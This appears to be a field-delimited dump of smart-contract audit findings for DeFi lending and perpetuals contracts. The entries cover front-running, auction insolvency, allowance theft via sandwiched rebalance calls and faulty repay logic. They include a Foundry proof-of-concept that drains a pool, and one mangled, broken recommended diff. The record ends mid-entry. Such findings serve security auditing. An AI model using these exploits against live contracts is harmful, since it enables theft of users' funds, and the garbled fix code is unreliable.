Notice how total pool debt is divided by number of loans to find the average loan debt size.\\n```\\n uint256 momp = _priceAt(\\n Deposits.findIndexOfSum(\\n deposits_,\\n Maths.wdiv(poolState_.debt, noOfLoans * 1e18)\\n )\\n );\\n```\\n\\nAn adversary can frontrun `kickAuction` by taking a huge loan, causing the price for which the amount of deposit above the undercollateralized loan bucket to have a lower probability of surpassing the average loan debt. The adversary can use the deposits for the buckets above and the total pool debt to figure out how much loan is necessary to grief the kicker significantly by lowering the MOMP and NP.чRecommend taking the snapshot average loan size of the pool to prevent frontrunning attacks.чKickers can be grieved, which can disincentivize users from kicking loans that deserve to be liquidated, causing the protocol to not work as desired as undercollateralized loans will not be liquidated.ч```\\n NP_t = (1 + rate_s) * MOMP_s * TP_s * \\frac{TP_s}{LUP_s} * \\frac{BI_s}{BI_t}\\n```\\n -Auction timers following liquidity can fall through the floor price causing pool insolvencyчmediumчWhen a borrower cannot pay their debt in an ERC20 pool, their position is liquidated and their assets enter an auction for other users to purchase small pieces of their assets. Because of the incentive that users wish to not pay above the standard market price for a token, users will generally wait until assets on auction are as cheap as possible to purchase; however, this is flawed because this guarantees a loss for all lenders participating in the protocol with each user that is liquidated.\\nConsider a situation where a user decides to short a coin through a loan and refuses to take the loss to retain the value of their position. When the auction is kicked off using the `kick()` function on this user, as time moves forward, the price for purchasing these assets becomes increasingly cheaper. 
These prices can fall through the floor price of the lending pool which will allow anybody to buy tokens for only a fraction of what they were worth originally leading to a state where the pool cant cover the debt of the user who has not paid their loan back with interest. The issue lies in the `_auctionPrice()` function of the `Auctions.sol` contract which calculates the price of the auctioned assets for the taker. This function does not consider the floor price of the pool. The proof of concept below outlines this scenario:\\nProof of Concept:\\n```\\n function testInsolvency() public {\\n \\n // ============== Setup Scenario ==============\\n uint256 interestRateOne = 0.05 * 10**18; // Collateral // Quote (loaned token, short position)\\n address poolThreeAddr = erc20PoolFactory.deployPool(address(dai), address(weth), interestRateOne);\\n ERC20Pool poolThree = ERC20Pool(address(poolThreeAddr));\\n vm.label(poolThreeAddr, \"DAI / WETH Pool Three\");\\n\\n // Setup scenario and send liquidity providers some tokens\\n vm.startPrank(address(daiDoner));\\n dai.transfer(address(charlie), 3200 ether);\\n vm.stopPrank();\\n\\n vm.startPrank(address(wethDoner));\\n weth.transfer(address(bob), 1000 ether);\\n vm.stopPrank();\\n\\n // ==============================================\\n\\n\\n // Note At the time (24/01/2023) of writing ETH is currently 1,625.02 DAI,\\n // so this would be a popular bucket to deposit in.\\n\\n // Start Scenario\\n // The lower dowm we go the cheaper wETH becomes - At a concentrated fenwick index of 5635, 1 wETH = 1600 DAI (Approx real life price)\\n uint256 fenwick = 5635;\\n\\n vm.startPrank(address(alice));\\n weth.deposit{value: 2 ether}();\\n weth.approve(address(poolThree), 2.226 ether);\\n poolThree.addQuoteToken(2 ether, fenwick); \\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 9 ether}();\\n weth.approve(address(poolThree), 9 ether);\\n poolThree.addQuoteToken(9 ether, fenwick); \\n vm.stopPrank();\\n\\n 
assertEq(weth.balanceOf(address(poolThree)), 11 ether);\\n\\n\\n // ======================== start testing ========================\\n\\n vm.startPrank(address(bob));\\n bytes32 poolSubsetHashes = keccak256(\"ERC20_NON_SUBSET_HASH\");\\n IPositionManagerOwnerActions.MintParams memory mp = IPositionManagerOwnerActions.MintParams({\\n recipient: address(bob),\\n pool: address(poolThree),\\n poolSubsetHash: poolSubsetHashes\\n });\\n positionManager.mint(mp);\\n positionManager.setApprovalForAll(address(rewardsManager), true);\\n rewardsManager.stake(1);\\n vm.stopPrank();\\n\\n\\n assertEq(dai.balanceOf(address(charlie)), 3200 ether);\\n vm.startPrank(address(charlie)); // Charlie runs away with the weth tokens\\n dai.approve(address(poolThree), 3200 ether);\\n poolThree.drawDebt(address(charlie), 2 ether, fenwick, 3200 ether);\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 62 days);\\n\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 0.5 ether}();\\n weth.approve(address(poolThree), 0.5 ether);\\n poolThree.kick(address(charlie)); // Kick off liquidation\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 10 hours);\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9020189981190878108); // 9 ether\\n\\n\\n vm.startPrank(address(bob));\\n // Bob Takes a (pretend) flashloan of 1000 weth to get cheap dai tokens\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether, address(bob), \"\");\\n \\n poolThree.settle(address(charlie), 100);\\n vm.stopPrank();\\n\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9152686732755985308); // Pool balance is still 9 ether 
instead of 11 ether - insolvency. \\n assertEq(dai.balanceOf(address(bob)), 3200 ether); // The original amount that charlie posted as deposit\\n\\n\\n vm.warp(block.timestamp + 2 hours);\\n // users attempt to withdraw after shaken by a liquidation\\n vm.startPrank(address(alice));\\n poolThree.removeQuoteToken(2 ether, fenwick);\\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n poolThree.removeQuoteToken(9 ether, fenwick);\\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(bob)), 1007664981389220443074); // 1007 ether, originally 1009 ether\\n assertEq(weth.balanceOf(address(alice)), 1626148471550317418); // 1.6 ether, originally 2 ether\\n\\n }\\n```\\nчIt's recommended that the price of the assets on auction consider the fenwick(s) being used when determining the price of assets on loan and do not fall below that particular index. With this fix in place, the worst case scenario is that lenders can pruchase these assets for the price they were loaned out for allowing them to recover the loss.чAn increase in borrowers who cant pay their debts back will result in a loss for all lenders.ч```\\n function testInsolvency() public {\\n \\n // ============== Setup Scenario ==============\\n uint256 interestRateOne = 0.05 * 10**18; // Collateral // Quote (loaned token, short position)\\n address poolThreeAddr = erc20PoolFactory.deployPool(address(dai), address(weth), interestRateOne);\\n ERC20Pool poolThree = ERC20Pool(address(poolThreeAddr));\\n vm.label(poolThreeAddr, \"DAI / WETH Pool Three\");\\n\\n // Setup scenario and send liquidity providers some tokens\\n vm.startPrank(address(daiDoner));\\n dai.transfer(address(charlie), 3200 ether);\\n vm.stopPrank();\\n\\n vm.startPrank(address(wethDoner));\\n weth.transfer(address(bob), 1000 ether);\\n vm.stopPrank();\\n\\n // ==============================================\\n\\n\\n // Note At the time (24/01/2023) of writing ETH is currently 1,625.02 DAI,\\n // so this would be a popular bucket to deposit 
in.\\n\\n // Start Scenario\\n // The lower dowm we go the cheaper wETH becomes - At a concentrated fenwick index of 5635, 1 wETH = 1600 DAI (Approx real life price)\\n uint256 fenwick = 5635;\\n\\n vm.startPrank(address(alice));\\n weth.deposit{value: 2 ether}();\\n weth.approve(address(poolThree), 2.226 ether);\\n poolThree.addQuoteToken(2 ether, fenwick); \\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 9 ether}();\\n weth.approve(address(poolThree), 9 ether);\\n poolThree.addQuoteToken(9 ether, fenwick); \\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(poolThree)), 11 ether);\\n\\n\\n // ======================== start testing ========================\\n\\n vm.startPrank(address(bob));\\n bytes32 poolSubsetHashes = keccak256(\"ERC20_NON_SUBSET_HASH\");\\n IPositionManagerOwnerActions.MintParams memory mp = IPositionManagerOwnerActions.MintParams({\\n recipient: address(bob),\\n pool: address(poolThree),\\n poolSubsetHash: poolSubsetHashes\\n });\\n positionManager.mint(mp);\\n positionManager.setApprovalForAll(address(rewardsManager), true);\\n rewardsManager.stake(1);\\n vm.stopPrank();\\n\\n\\n assertEq(dai.balanceOf(address(charlie)), 3200 ether);\\n vm.startPrank(address(charlie)); // Charlie runs away with the weth tokens\\n dai.approve(address(poolThree), 3200 ether);\\n poolThree.drawDebt(address(charlie), 2 ether, fenwick, 3200 ether);\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 62 days);\\n\\n\\n vm.startPrank(address(bob));\\n weth.deposit{value: 0.5 ether}();\\n weth.approve(address(poolThree), 0.5 ether);\\n poolThree.kick(address(charlie)); // Kick off liquidation\\n vm.stopPrank();\\n\\n vm.warp(block.timestamp + 10 hours);\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9020189981190878108); // 9 ether\\n\\n\\n vm.startPrank(address(bob));\\n // Bob Takes a (pretend) flashloan of 1000 weth to get cheap dai tokens\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 
1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether , address(bob), \"\");\\n weth.approve(address(poolThree), 1000 ether);\\n poolThree.take(address(charlie), 1000 ether, address(bob), \"\");\\n \\n poolThree.settle(address(charlie), 100);\\n vm.stopPrank();\\n\\n\\n assertEq(weth.balanceOf(address(poolThree)), 9152686732755985308); // Pool balance is still 9 ether instead of 11 ether - insolvency. \\n assertEq(dai.balanceOf(address(bob)), 3200 ether); // The original amount that charlie posted as deposit\\n\\n\\n vm.warp(block.timestamp + 2 hours);\\n // users attempt to withdraw after shaken by a liquidation\\n vm.startPrank(address(alice));\\n poolThree.removeQuoteToken(2 ether, fenwick);\\n vm.stopPrank();\\n\\n vm.startPrank(address(bob));\\n poolThree.removeQuoteToken(9 ether, fenwick);\\n vm.stopPrank();\\n\\n assertEq(weth.balanceOf(address(bob)), 1007664981389220443074); // 1007 ether, originally 1009 ether\\n assertEq(weth.balanceOf(address(alice)), 1626148471550317418); // 1.6 ether, originally 2 ether\\n\\n }\\n```\\n -Incorrect MOMP calculation in neutral price calculationчmediumчWhen calculating MOMP to find the neutral price of a borrower, borrower's accrued debt is divided by the total number of loans in the pool, but it's total pool's debt that should be divided. The mistake will result in lower neutral prices and more lost bonds to kickers.\\nAs per the whitepaper:\\nMOMP: is the price at which the amount of deposit above it is equal to the average loan size of the pool. MOMP is short for “Most Optimistic Matching Price”, as it's the price at which a loan of average size would match with the most favorable lenders on the book.\\nI.e. 
MOMP is calculated on the total number of loans of a pool (so that the average loan size could be found).\\nMOMP calculation is implemented correctly when kicking a debt, however its implementation in the Loans.update function is not correct:\\n```\\nuint256 loansInPool = loans_.loans.length - 1 + auctions_.noOfAuctions;\\nuint256 curMomp = _priceAt(Deposits.findIndexOfSum(deposits_, Maths.wdiv(borrowerAccruedDebt_, loansInPool * 1e18)));\\n```\\n\\nHere, only the borrower's debt (borrowerAccruedDebt_) is divided, not the entire debt of the pool.чIssue Incorrect MOMP calculation in neutral price calculation\\nConsider using total pool's debt in the MOMP calculation in `Loans.update`.чThe miscalculation affects only the borrower's neutral price calculation. Since MOMP is calculated on a smaller debt (borrower's debt will almost always be smaller than total pool's debt), the value of MOMP will be smaller than expected, and the neutral price will also be smaller (from the whitepaper: \"The NP of a loan is the interest-adjusted MOMP...\"). This will cause kickers to lose their bonds more often than expected, as per the whitepaper:\\nIf the liquidation auction yields a value that is over the “Neutral Price,” NP, the kicker forfeits a portion or all of their bond.ч```\\nuint256 loansInPool = loans_.loans.length - 1 + auctions_.noOfAuctions;\\nuint256 curMomp = _priceAt(Deposits.findIndexOfSum(deposits_, Maths.wdiv(borrowerAccruedDebt_, loansInPool * 1e18)));\\n```\\n -Lender force Loan become defaultчhighч`repay()` directly transfers the debt token to the Lender, but does not consider that the Lender may be unable to accept the token (e.g. it is on the token contract's blacklist), resulting in `repay()` always reverting; finally the Loan can only expire and become defaulted\\nThe only way for the borrower to get the collateral token back is to repay the amount owed via repay(). Currently the repay() method transfers the debt token directly to the Lender. 
This has a problem: if the Lender is blacklisted by the debt token now, the debtToken.transferFrom() method will fail and the repay() method will always fail and finally the Loan will default. Example: Assume collateral token = ETH,debt token = USDC, owner = alice 1.alice call request() to loan 2000 usdc , duration = 1 mon 2.bob call clear(): loanID =1 3.bob transfer loan[1].lender = jack by Cooler.approve/transfer\\nNote: jack has been in USDC's blacklist for some reason before or bob in USDC's blacklist for some reason now, it doesn't need transfer 'lender') 4.Sometime before the expiration date, alice call repay(id=1) , it will always revert, Because usdc.transfer(jack) will revert 5.after 1 mon, loan[1] default, jack call defaulted() get collateral token\\n```\\n function repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n// rest of code\\n debt.transferFrom(msg.sender, loan.lender, repaid); //***<------- lender in debt token's blocklist will revert , example :debt = usdc\\n collateral.transfer(owner, decollateralized);\\n }\\n```\\nчInstead of transferring the debt token directly, put the debt token into the Cooler.sol and set like: withdrawBalance[lender]+=amount, and provide the method withdraw() for lender to get debtToken backчLender forced Loan become default for get collateral token, owner lost collateral tokenч```\\n function repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n// rest of code\\n debt.transferFrom(msg.sender, loan.lender, repaid); //***<------- lender in debt token's blocklist will revert , example :debt = usdc\\n collateral.transfer(owner, decollateralized);\\n }\\n```\\n -`Cooler.roll()` wouldn't work as expected when `newCollateral = 0`.чmediumч`Cooler.roll()` is used to increase the loan duration by transferring the additional collateral.\\nBut there will be some problems when `newCollateral = 0`.\\n```\\n function roll (uint256 loanID) external {\\n Loan 
storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n\\n uint256 newCollateral = collateralFor(loan.amount, req.loanToCollateral) - loan.collateral;\\n uint256 newDebt = interestFor(loan.amount, req.interest, req.duration);\\n\\n loan.amount += newDebt;\\n loan.expiry += req.duration;\\n loan.collateral += newCollateral;\\n \\n collateral.transferFrom(msg.sender, address(this), newCollateral); //@audit 0 amount\\n }\\n```\\n\\nIn `roll()`, it transfers the `newCollateral` amount of collateral to the contract.\\nAfter the borrower repaid most of the debts, `loan.amount` might be very small and `newCollateral` for the original interest might be 0 because of the rounding issue.\\nThen as we can see from this one, some tokens might revert for 0 amount and `roll()` wouldn't work as expected.чI think we should handle it differently when `newCollateral = 0`.\\nAccording to impact 2, I think it would be good to revert when `newCollateral = 0`.чThere will be 2 impacts.\\nWhen the borrower tries to extend the loan using `roll()`, it will revert with the weird tokens when `newCollateral = 0`.\\nAfter the borrower noticed he couldn't repay anymore(so the lender will default the loan), the borrower can call `roll()` again when `newCollateral = 0`. 
In this case, the borrower doesn't lose anything but the lender must wait for `req.duration` again to default the loan.ч```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n\\n uint256 newCollateral = collateralFor(loan.amount, req.loanToCollateral) - loan.collateral;\\n uint256 newDebt = interestFor(loan.amount, req.interest, req.duration);\\n\\n loan.amount += newDebt;\\n loan.expiry += req.duration;\\n loan.collateral += newCollateral;\\n \\n collateral.transferFrom(msg.sender, address(this), newCollateral); //@audit 0 amount\\n }\\n```\\n -Loan is rollable by defaultчmediumчMaking the loan rollable by default gives an unfair early advantage to the borrowers.\\nWhen clearing a new loan, the flag of `rollable` is set to true by default:\\n```\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n```\\n\\nThis means a borrower can extend the loan anytime before the expiry:\\n```\\n function roll (uint256 loanID) external {\\n Loan storage loan = loans[loanID];\\n Request memory req = loan.request;\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n\\n if (!loan.rollable)\\n revert NotRollable();\\n```\\n\\nIf the lenders do not intend to allow rollable loans, they should separately toggle the status to prevent that:\\n```\\n function toggleRoll(uint256 loanID) external returns (bool) {\\n // rest of code\\n loan.rollable = !loan.rollable;\\n // rest of code\\n }\\n```\\n\\nI believe it gives an unfair advantage to the borrower because they can re-roll the loan before the lender's transaction forbids this action.чI believe `rollable` should be set to false by default or at least add an extra function parameter to determine the initial value of this status.чLenders who do not want the loans to be used more than once, have to 
bundle their transactions. Otherwise, it is possible that someone might roll their loan, especially if the capital requirements are not huge because anyone can roll any loan.ч```\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n```\\n -Use safeTransfer/safeTransferFrom consistently instead of transfer/transferFromчhighчUse safeTransfer/safeTransferFrom consistently instead of transfer/transferFrom\\n```\\n function clear (uint256 reqID) external returns (uint256 loanID) {\\n Request storage req = requests[reqID];\\n\\n factory.newEvent(reqID, CoolerFactory.Events.Clear);\\n\\n if (!req.active) \\n revert Deactivated();\\n else req.active = false;\\n\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n\\n loanID = loans.length;\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n debt.transferFrom(msg.sender, owner, req.amount);\\n }\\n```\\nчConsider using safeTransfer/safeTransferFrom consistently.чIf the token send fails, it will cause a lot of serious problems. 
For example, in the clear function, if debt token is ZRX, the lender can clear request without providing any debt token.ч```\\n function clear (uint256 reqID) external returns (uint256 loanID) {\\n Request storage req = requests[reqID];\\n\\n factory.newEvent(reqID, CoolerFactory.Events.Clear);\\n\\n if (!req.active) \\n revert Deactivated();\\n else req.active = false;\\n\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n\\n loanID = loans.length;\\n loans.push(\\n Loan(req, req.amount + interest, collat, expiration, true, msg.sender)\\n );\\n debt.transferFrom(msg.sender, owner, req.amount);\\n }\\n```\\n -Fully repaying a loan will result in debt payment being lostчhighчWhen a `loan` is fully repaid the `loan` `storage` is deleted. Since `loan` is a `storage` reference to the `loan`, `loan.lender` will return `address(0)` after the `loan` has been deleted. This will result in the `debt` being transferred to `address(0)` instead of the lender. Some ERC20 tokens will revert when being sent to `address(0)` but a large number will simply be sent there and lost forever.\\n```\\nfunction repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n \\n uint256 decollateralized = loan.collateral * repaid / loan.amount;\\n\\n if (repaid == loan.amount) delete loans[loanID];\\n else {\\n loan.amount -= repaid;\\n loan.collateral -= decollateralized;\\n }\\n\\n debt.transferFrom(msg.sender, loan.lender, repaid);\\n collateral.transfer(owner, decollateralized);\\n}\\n```\\n\\nIn `Cooler#repay` the `loan` storage associated with the loanID being repaid is deleted. `loan` is a storage reference so when `loans[loanID]` is deleted so is `loan`. 
The result is that `loan.lender` is now `address(0)` and the `loan` payment will be sent there instead.чSend collateral/debt then delete:\\n```\\n- if (repaid == loan.amount) delete loans[loanID];\\n+ if (repaid == loan.amount) {\\n+ debt.transferFrom(msg.sender, loan.lender, loan.amount);\\n+ collateral.transfer(owner, loan.collateral);\\n+ delete loans[loanID];\\n+ return;\\n+ }\\n```\\nчLender's funds are sent to `address(0)`ч```\\nfunction repay (uint256 loanID, uint256 repaid) external {\\n Loan storage loan = loans[loanID];\\n\\n if (block.timestamp > loan.expiry) \\n revert Default();\\n \\n uint256 decollateralized = loan.collateral * repaid / loan.amount;\\n\\n if (repaid == loan.amount) delete loans[loanID];\\n else {\\n loan.amount -= repaid;\\n loan.collateral -= decollateralized;\\n }\\n\\n debt.transferFrom(msg.sender, loan.lender, repaid);\\n collateral.transfer(owner, decollateralized);\\n}\\n```\\n -No check if Arbitrum L2 sequencer is down in Chainlink feedsчmediumчUsing Chainlink in L2 chains such as Arbitrum requires to check if the sequencer is down to avoid prices from looking like they are fresh although they are not.\\nThe bug could be leveraged by malicious actors to take advantage of the sequencer downtime.\\n```\\n function getEthPrice() internal view returns (uint) {\\n (, int answer,, uint updatedAt,) =\\n ethUsdPriceFeed.latestRoundData();\\n\\n if (block.timestamp - updatedAt >= 86400)\\n revert Errors.StalePrice(address(0), address(ethUsdPriceFeed));\\n\\n if (answer <= 0)\\n revert Errors.NegativePrice(address(0), address(ethUsdPriceFeed));\\n\\n return uint(answer);\\n }\\n```\\nчIssue No check if Arbitrum L2 sequencer is down in Chainlink feedsчThe impact depends on the usage of the GLP. 
If it is used as part of the collateral for lenders:\\nUsers can get better borrows if the price is above the actual price\\nUsers can avoid liquidations if the price is under the actual priceч```\\n function getEthPrice() internal view returns (uint) {\\n (, int answer,, uint updatedAt,) =\\n ethUsdPriceFeed.latestRoundData();\\n\\n if (block.timestamp - updatedAt >= 86400)\\n revert Errors.StalePrice(address(0), address(ethUsdPriceFeed));\\n\\n if (answer <= 0)\\n revert Errors.NegativePrice(address(0), address(ethUsdPriceFeed));\\n\\n return uint(answer);\\n }\\n```\\n -GMX Reward Router's claimForAccount() can be abused to incorrectly add WETH to tokensInчmediumчWhen `claimFees()` is called, the Controller automatically adds WETH to the user's account. However, in the case where no fees have accrued yet, there will not be WETH withdrawn. In this case, the user will have WETH added as an asset in their account, while they won't actually have any WETH holdings.\\nWhen a user calls the GMX Reward Router's `claimFees()` function, the RewardRouterController confirms the validity of this call in the `canCallClaimFees()` function:\\n```\\nfunction canCallClaimFees()\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n return (true, WETH, new address[](0));\\n}\\n```\\n\\nThis function assumes that any user calling `claimFees()` will always receive `WETH`. However, this is only the case if their stake has been accruing.\\nImagine the following two actions are taken in the same block:\\nDeposit assets into GMX staking\\nCall claimFees()\\nThe result will be that `claimFees()` returns no `WETH`, but `WETH` is added to the account's asset list.\\nThe same is true if a user performs the following three actions:\\nCall claimFees()\\nWithdraw all ETH from the WETH contract\\nCall claimFees() againчThe best way to solve this is actually not at the Controller level. 
It's to solve the issue of fake assets being added once and not have to worry about it on the Controller level in the future.\\nThis can be accomplished in `AccountManager.sol#_updateTokensIn()`. It should be updated to only add the token to the assets list if it has a positive balance, as follows:\\n```\\nfunction _updateTokensIn(address account, address[] memory tokensIn)\\n internal\\n{\\n uint tokensInLen = tokensIn.length;\\n for(uint i; i < tokensInLen; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n if (IAccount(account).hasAsset(tokensIn[i]) == false)\\n// Add the line below\\n if (IAccount(account).hasAsset(tokensIn[i]) == false && IERC20(token).balanceOf(account) > 0)\\n IAccount(account).addAsset(tokensIn[i]);\\n }\\n}\\n```\\n\\nHowever, `_updateTokensIn()` is currently called before the function is executed in `exec()`, so that would need to be changed as well:\\n```\\nfunction exec(address account, address target, uint amt, bytes calldata data) external onlyOwner(account) {\\n bool isAllowed;\\n address[] memory tokensIn;\\n address[] memory tokensOut;\\n (isAllowed, tokensIn, tokensOut) = controller.canCall(target, (amt > 0), data);\\n if (!isAllowed) revert Errors.FunctionCallRestricted();\\n// Remove the line below\\n _updateTokensIn(account, tokensIn);\\n (bool success,) = IAccount(account).exec(target, amt, data);\\n if (!success)\\n revert Errors.AccountInteractionFailure(account, target, amt, data);\\n// Add the line below\\n _updateTokensIn(account, tokensIn);\\n _updateTokensOut(account, tokensOut);\\n if (!riskEngine.isAccountHealthy(account))\\n revert Errors.RiskThresholdBreached();\\n}\\n```\\n\\nWhile this fix does require changing a core contract, it would negate the need to worry about edge cases causing incorrect accounting of tokens on any future integrations, which I think is a worthwhile trade off.\\nThis accuracy is especially important as Sentiment becomes better known and integrated into the 
Arbitrum ecosystem. While I know that having additional assets doesn't cause internal problems at present, it is hard to predict what issues inaccurate data will cause in the future. Seeing that Plutus is checking Sentiment contracts for their whitelist drove this point home — we need to ensure the data stays accurate, even in edge cases, or else there will be trickle down problems we can't currently predict.чA user can force their account into a state where it has `WETH` on the asset list, but doesn't actually hold any `WETH`.\\nThis specific Impact was judged as Medium for multiple issues in the previous contest:ч```\\nfunction canCallClaimFees()\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n return (true, WETH, new address[](0));\\n}\\n```\\n -PerpDespository#reblance and rebalanceLite can be called to drain funds from anyone who has approved PerpDepositoryчhighчPerpDespository#reblance and rebalanceLite allows anyone to specify the account that pays the quote token. These functions allow a malicious user to abuse any allowance provided to PerpDirectory. 
rebalance is the worst of the two because the malicious user could sandwich attack the rebalance to steal all the funds and force the unsuspecting user to pay the `shortfall`.\\n```\\nfunction rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n address account // @audit user specified payer\\n) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n account // @audit user address passed directly\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n}\\n```\\n\\n`rebalance` is an unpermissioned function that allows anyone to call and `rebalance` the PNL of the depository. 
It allows the caller to specify the an account that passes directly through to `_rebalanceNegativePnlWithSwap`\\n```\\nfunction _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n) private returns (uint256, uint256) {\\n // rest of code\\n // @audit this uses user supplied swap parameters which can be malicious\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96,\\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n int256 shortFall = int256(\\n quoteAmount.fromDecimalToDecimal(18, ERC20(quoteToken).decimals())\\n ) - int256(quoteAmountOut);\\n if (shortFall > 0) {\\n // @audit shortfall is taken from account specified by user\\n IERC20(quoteToken).transferFrom(\\n account,\\n address(this),\\n uint256(shortFall)\\n );\\n } else if (shortFall < 0) {\\n // rest of code\\n }\\n vault.deposit(quoteToken, quoteAmount);\\n\\n emit Rebalanced(baseAmount, quoteAmount, shortFall);\\n return (baseAmount, quoteAmount);\\n}\\n```\\n\\n`_rebalanceNegativePnlWithSwap` uses both user specified swap parameters and takes the shortfall from the account specified by the user. This is where the function can be abused to steal funds from any user that sets an allowance for this contract. A malicious user can sandwich attack the swap and specify malicious swap parameters to allow them to steal the entire rebalance. This creates a large shortfall which will be taken from the account that they specify, effectively stealing the funds from the user.\\nExample: Any `account` that gives the depository allowance can be stolen from. Imagine the following scenario. 
The multisig is going to rebalance the contract for 15000 USDC worth of ETH and based on current market conditions they are estimating that there will be a 1000 USDC shortfall because of the difference between the perpetual and spot prices (divergences between spot and perpetual price are common in trending markets). They first approve the depository for 1000 USDC. A malicious user sees this approval and immediately submits a transaction of their own. They request to rebalance only 1000 USDC worth of ETH and sandwich attack the swap to steal the rebalance. They specify the multisig as `account` and force it to pay the 1000 USDC shortfall and burn their entire allowance, stealing the USDC.чPerpDespository#reblance and rebalanceLite should use msg.sender instead of account:\\n```\\n function rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n- address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n- account \\n+ msg.sender\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n```\\nчAnyone that gives the depository allowance can easily have their entire allowance stolenч```\\nfunction rebalance(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n int8 polarity,\\n address account // @audit user specified payer\\n) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlWithSwap(\\n amount,\\n amountOutMinimum,\\n sqrtPriceLimitX96,\\n swapPoolFee,\\n account // @audit user address 
passed directly\\n );\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlWithSwap(amount, amountOutMinimum, sqrtPriceLimitX96, swapPoolFee, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n}\\n```\\n -USDC deposited to PerpDepository.sol are irretrievable and effectively causes UDX to become undercollateralizedчhighчPerpDepository rebalances negative PNL into USDC holdings. This preserves the delta neutrality of the system by exchanging base to quote. This is problematic though as once it is in the vault as USDC it can never be withdrawn. The effect is that the delta neutral position can never be liquidated but the USDC is inaccessible so UDX is effectively undercollateralized.\\n`_processQuoteMint`, `_rebalanceNegativePnlWithSwap` and `_rebalanceNegativePnlLite` all add USDC collateral to the system. There were originally two ways in which USDC could be removed from the system. The first was positive PNL rebalancing, which has now been deactivated. The second is for the owner to remove the USDC via `withdrawInsurance`.\\n```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert 